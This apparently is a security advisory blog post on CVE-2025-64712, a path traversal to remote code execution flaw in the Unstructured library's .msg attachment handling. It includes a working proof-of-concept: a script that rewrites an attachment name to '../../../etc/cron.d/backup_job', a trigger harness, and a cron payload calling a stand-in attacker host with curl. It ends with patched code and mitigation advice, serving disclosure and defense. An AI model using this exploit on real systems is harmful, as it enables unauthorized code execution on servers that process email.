Mon 23 February 2026
CVE-2025-64712
Critical Path Traversal RCE in Unstructured Library MSG Processing
February 18, 2026 · CVSS 9.8 Critical · Unstructured < 0.18.18
| CVE ID | CVSS | Affected | Fixed |
|---|---|---|---|
| CVE-2025-64712 | 9.8 Critical | < 0.18.18 | 0.18.18+ |
CVE-2025-64712 Overview: Path Traversal in Unstructured Library
The Unstructured Python library is an open-source toolkit for pre-processing complex document types. In a little over a year, the Unstructured library surpassed 4 million downloads and is used in nearly 10,000 public GitHub repositories, 100 Python packages, and behind the scenes in dozens of LLM-powered products. However, a critical Path Traversal (CWE-22) vulnerability was discovered in its partition_msg function, which processes Microsoft Outlook .msg files. When the process_attachments setting is enabled—which it is by default—the library can be manipulated to write files outside of its intended temporary directories.
def partition_msg(
filename: Optional[str] = None,
*,
file: Optional[IO[bytes]] = None,
metadata_filename: Optional[str] = None,
metadata_last_modified: Optional[str] = None,
process_attachments: bool = True, # the vulnerability trigger
**kwargs: Any,
) -> list[Element]:
<SNIP>
Path Traversal in Unstructured Library: Unsafe Filename Handling
The core of the issue is a Path Traversal (CWE-22) vulnerability. The library's _attachment_file_name() function pulls the name of an attachment directly from the .msg file without any sanitization.
@lazyproperty
def _attachment_file_name(self) -> str:
"""The original name of the attached file, no path.
This value is 'unknown' if it is not present in the MSG file (not
expected).
"""
return self._attachment.file_name or "unknown"
CVE-2025-64712 Proof-of-Concept: Remote Code Execution via Path Traversal
Exploitation of CVE-2025-64712 involves a deliberate three-stage process to transform a standard email attachment into a system-level command. The following steps outline how an attacker moves from a simple .msg file to full Remote Code Execution (RCE).
Step 1: Crafting the Initial .msg File
The attack begins by generating a legitimate Microsoft Outlook Message (.msg) file to serve as the delivery vector.
-
Initialize the Draft: Open Outlook and create a new email message.
-
Embed the Payload: Populate the message fields and attach the file containing your target content (e.g., a cron job script intended for the target’s configuration directory).
-
Export the File: Navigate to File > Save As (or Download > Download as MSG in web clients) to export the message.
At this stage, the file is harmless because the attachment name is standard (e.g., backup_job).

Step 2: Injecting the Traversal Path
The attacker uses a specialized Python script to modify the binary structure of the .msg file. By targeting the OLE structures within the file, the attacker renames the attachment from a simple filename to a relative path containing traversal sequences.
-
The Transformation: backup_job becomes ../../../etc/cron.d/backup_job.
-
The Result: A crafted payload.msg is generated where the filename itself contains the instructions to escape the temporary directory.
#!/usr/bin/env python3
"""
rename_msg_attachment.py
------------------------
Rename an attachment's filename inside a .msg (OLE2/Compound Document) file.
Supports new filenames of ANY length — reallocates mini-sectors as needed.
Edit the three variables below and run:
python rename_msg_attachment.py
"""
import sys
import struct
import shutil
import os
import math
INPUT_FILE = "backup.msg" # Path to the source .msg file
OLD_NAME = "backup_job" # Current attachment filename
NEW_NAME = "../../../etc/cron.d/backup_job" # New attachment filename
OUTPUT_FILE = "payload.msg" # Output path — leave empty "" to overwrite INPUT_FILE
<SNIP>
# Core rename logic
def rename_attachment(input_path, old_name, new_name, output_path):
print(f"[*] Opening: {input_path}")
ole = OleFile(input_path)
attach_storages = find_attach_storages(ole)
if not attach_storages:
err("No attachment storages found in this .msg file.")
print(f"[*] Found {len(attach_storages)} attachment(s).")
renamed = 0
for att in attach_storages:
children = get_children(ole, att['idx'])
by_name = {c['name'].upper(): c for c in children}
long_e = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
disp_e = by_name.get(prop_stream_name(PR_DISPLAY_NAME).upper())
ext_e = by_name.get(prop_stream_name(PR_ATTACH_EXTENSION).upper())
current = None
if long_e:
current = read_unicode(ole, long_e['idx'])
elif short_e:
current = read_unicode(ole, short_e['idx'])
print(f" [{att['name']}] current filename: {current!r}")
if current is None or current.lower() != old_name.lower():
continue
# Encode new values
new_encoded = encode_unicode(new_name)
short_encoded = encode_unicode(short_name(new_name))
parts = new_name.rsplit('.', 1)
new_ext = ('.' + parts[1]) if len(parts) == 2 else ''
ext_encoded = encode_unicode(new_ext)
print(f" [+] Match! Renaming '{current}' -> '{new_name}'")
print(f" old size: {len(encode_unicode(current))} bytes "
f"new size: {len(new_encoded)} bytes")
if long_e:
ole.write_stream(long_e['idx'], new_encoded)
print(f" ✓ Long filename patched.")
if short_e:
ole.write_stream(short_e['idx'], short_encoded)
print(f" ✓ Short filename patched -> '{short_name(new_name)}'")
if disp_e:
ole.write_stream(disp_e['idx'], new_encoded)
print(f" ✓ Display name patched.")
if ext_e:
ole.write_stream(ext_e['idx'], ext_encoded)
print(f" ✓ Extension patched -> '{new_ext}'")
renamed += 1
if renamed == 0:
print(f"\n[!] No attachment named '{old_name}' was found.")
all_names = []
for att in attach_storages:
children = get_children(ole, att['idx'])
by_name = {c['name'].upper(): c for c in children}
long_e = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
name = None
if long_e:
name = read_unicode(ole, long_e['idx'])
elif short_e:
name = read_unicode(ole, short_e['idx'])
if name:
all_names.append(name)
if all_names:
print(f" Available attachment(s): {', '.join(repr(n) for n in all_names)}")
def similarity(a, b):
a, b = a.lower(), b.lower()
return sum(c in b for c in a) / max(len(a), 1)
best = max(all_names, key=lambda n: similarity(old_name, n))
if similarity(old_name, best) > 0.5:
print(f" Did you mean: '{best}' ?")
sys.exit(1)
ole.save(output_path)
print(f"\n[✓] Saved to: {output_path} ({renamed} attachment(s) renamed)")
<SNIP>

Step 3: Setting Up the Test Environment
To reproduce the flaw, a controlled environment (typically a Docker container) is used to run the vulnerable version of the unstructured library (v0.18.15). A simple Python wrapper is written to call the partition_msg function with the critical process_attachments=True flag enabled.
import os
import sys
from unstructured.partition.msg import partition_msg
# Disable the digit limit that causes parser crashes
if hasattr(sys, 'set_int_max_str_digits'):
sys.set_int_max_str_digits(0)
def process_msg():
print("[*] Handing exploit.msg to partition_msg()...")
try:
# This triggers the vulnerable function:
partition_msg(
filename="payload.msg",
process_attachments=True
)
except Exception as e:
# We catch the exception because the parser often crashes
# AFTER the file is written due to OLE sector math errors.
print(f"[!] Parser finished with: {e}")
# THE FINAL VERDICT
if os.path.exists("/etc/cron.d/backup_job"):
print("\n" + "="*45)
print("!!! VULNERABILITY REPRODUCED !!!")
print("The library wrote successfuly to '/etc/cron.d/backup_job'")
with open("/etc/cron.d/backup_job", "r") as f:
print(f"File content: {f.read()}")
print("="*45)
else:
print("\n[-] Exploit failed: /etc/cron.d/backup_job not found.")
if __name__ == "__main__":
process_msg()
Step 4: Exploitation and RCE
When the reproduction script processes the malicious payload.msg, the library extracts the attachment. Because it lacks sanitization, it joins the traversal string to its internal path, writing the file directly into the host's system directory.
- File Write: The library writes the attacker's script to /etc/cron.d/backup_job.
- Command Execution: The system's cron daemon picks up the new job, which might contain a command like curl http://attacker-ip:port/rce_test.
- The Verdict: The attacker observes an incoming request on their server, confirming that they can now execute arbitrary code on the target system.

How to Fix CVE-2025-64712 in Unstructured Library
The most effective way to secure your environment is to update to Unstructured version 0.18.18 or higher. The fix introduces a robust sanitization process that strips away dangerous path components.
Remediated Code Analysis
The patched version now includes logic to clean the filename for both Unix and Windows path separators:
# The updated, safe logic in v0.18.18+
raw_filename = self.attachment.file_name or "unknown"
# Remove path components and handle cross-platform attacks
safe_filename = os.path.basename(raw_filename.replace("\\", "/"))
# Strip null bytes and control characters
safe_filename = safe_filename.replace("\0", "")
# Ensure the filename isn't empty or just dots
if not safe_filename or safe_filename in (".", ".."):
safe_filename = "unknown"
CVE-2025-64712 Mitigation and Best Practices
- Update Now: If you use unstructured for email processing, ensure you are on version 0.18.18 or later versions.
- Sanitize Inputs: Always use os.path.basename() when handling filenames provided by external files.
- Permission Check: Run your processing scripts with the minimum necessary permissions to limit the impact of a potential file-write vulnerability.
| Resource | Link |
|---|---|
| Unstructured CVE-2025-64712 | https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-gm8q-m8mv-jj5m |
| Unstructured Fix | https://github.com/Unstructured-IO/unstructured/compare/0.18.15...0.18.18 |
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2025-64712 |
| CWE-22 | https://cwe.mitre.org/data/definitions/22.html |
Table of Contents